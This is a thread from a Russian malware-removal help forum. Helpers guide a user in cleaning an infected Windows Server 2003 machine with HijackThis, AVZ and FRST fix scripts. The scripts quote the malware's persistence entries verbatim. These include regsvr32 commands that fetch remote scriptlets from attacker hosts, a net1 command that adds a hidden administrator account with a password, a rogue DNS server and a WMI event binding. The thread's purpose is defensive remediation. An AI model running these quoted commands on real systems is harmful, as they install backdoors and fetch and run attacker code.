Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Thinker, спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
На DHCP замените DNS 223.5.5.5 на другой - провайдерский, Яндекс.
Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки:
Код:
O4 - HKLM\..\Run: [start] = C:\WINDOWS\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O7 - IPSec: Name: win (2019/12/12) - {f7d9f5cf-0dd5-48fc-95ff-c6d7ecae6bea} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/12/12) - {f7d9f5cf-0dd5-48fc-95ff-c6d7ecae6bea} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/12/12) - {f7d9f5cf-0dd5-48fc-95ff-c6d7ecae6bea} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/12/12) - {f7d9f5cf-0dd5-48fc-95ff-c6d7ecae6bea} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/12/12) - {f7d9f5cf-0dd5-48fc-95ff-c6d7ecae6bea} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O17 - HKLM\System\CCS\Services\Tcpip\..\{17266C7B-F506-4E68-8003-80CC4F8203A0}: [NameServer] = 223.5.5.5
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{17266C7B-F506-4E68-8003-80CC4F8203A0}: [NameServer] = 223.5.5.5
Перезагрузите сервер.
Не выставляйте в интернет свою инфраструктуру, множество открытых портов, в т. ч. относящихся к Windows, а версия сервера 2003 давно не поддерживается.
var
LogPath : string;
ScriptPath : string;
begin
LogPath := GetAVZDirectory + 'log\avz_log.txt';
if FileExists(LogPath) Then DeleteFile(LogPath);
ScriptPath := GetAVZDirectory +'ScanVuln.txt';
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
exit;
end;
end;
if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.
После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, прикрепите его к сообщению.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
Выделите и скопируйте в буфер обмена следующий код:
Код:
Start::
"iGjh" => service could not be unlocked. <==== ATTENTION
HKLM\SYSTEM\ControlSet001\Services\iGjh => cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad®svr32 /s /u /n /i:http://78.142.194.116:8016/blue.txt scrobj.dll <==== ATTENTION (Rootkit!/Locked Service)
"uti3ndu1" => service could not be unlocked. <==== ATTENTION
HKLM\SYSTEM\ControlSet001\Services\uti3ndu1 => \??\C:\WINDOWS\system32\Drivers\uti3ndu1.sys <==== ATTENTION (Rootkit!/Locked Service)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => c:\Program Files\Malwarebytes' Anti-Malware\mbamext.dll -> No File
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => c:\Program Files\Malwarebytes' Anti-Malware\mbamext.dll -> No File
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
Reboot:
End::
Запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
"ownno" - файл в корне, размер 0, до заражения вроде не было
fixlog.txt прикрепляю. Прочитав содержимое, от дальнейших шагов из предыдущего сообщения пока воздержался (на всякий случай, если вдруг потребуется сначала еще что-то сделать).
Когда я писал, что воздержался от дальнейших шагов, я имел ввиду, только до вашего ответа (на случай, если вдруг, по результатам fixlog, понадобится что-то еще сделать, до установки обновлений)
- - - - -Добавлено - - - - -
Сообщение от Vvvyg
И снаружи ничего не закрыли, ждите рецидива.
Можете написать номера 1-2 открытых портов для примера? Возможно, это было временно